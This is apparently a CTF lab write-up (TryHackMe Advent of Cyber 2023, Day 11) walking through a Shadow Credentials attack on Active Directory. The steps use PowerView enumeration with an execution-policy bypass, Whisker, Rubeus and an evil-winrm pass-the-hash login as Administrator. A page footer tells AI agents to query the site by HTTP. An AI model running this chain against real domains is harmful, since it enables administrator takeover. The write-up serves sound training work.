# Day 11

Learning Objectives<br>

* Understanding Active Directory
* Introduction to Windows Hello for Business
* Prerequisites for exploiting GenericWrite privilege
* How the Shadow Credentials attack works
* How to exploit the vulnerability

Active Directory 101

Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

This room is straightforward will all the commands and instructions given to us.&#x20;

As instructed we first execute the following command in powershell as part of our enumeration.

{% code overflow="wrap" lineNumbers="true" %}

```powershell
cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.
```

{% endcode %}

We then execute this command.

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
```

{% endcode %}

<figure><img src="/files/Ur9KyxzPt1iAdcS2OVWY" alt=""><figcaption><p>Enumeration gives us user ID</p></figcaption></figure>

We can now procced with the exploit.

As instructed we use the tool Whisker.&#x20;

Whisker a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we can run the add command from Whisker to simulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.

This task can be accomplished by running the following command:

```powershell
.\Whisker.exe add /target:Administrator
```

In our case, we'll have to replace the `/target` parameter with the one from the enumeration step executed inside our VM.

The tool will conveniently provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command ready to be launched using `Rubeus.`

`Rubeus` is a C# toolset designed for direct Kerberos interaction and exploitation, was developed by SpecterOps. a pass-the-hash attack!

The next command will be&#x20;

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>
```

{% endcode %}

This will give us an NTLM hash which we can use `Evil-WinRM`, a tool for remotely managing Windows systems abusing the Windows Remote Management (WinRM) protocol.

```
evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'
```

<figure><img src="/files/pRp29sfiKgOX0cMntwAL" alt=""><figcaption><p>Remote Access with evil-WinRM</p></figcaption></figure>

This will gives us remote access and we can proceed with answering the questions.

```
What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output for Rubeus
```

```
What is the content of flag.txt on the Administrator Desktop?
[REDACTED]
```

<figure><img src="/files/BuHOsxinrJ6YLr1kvBAg" alt=""><figcaption><p>Flag found</p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/advent-of-cyber-2023/day-11.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.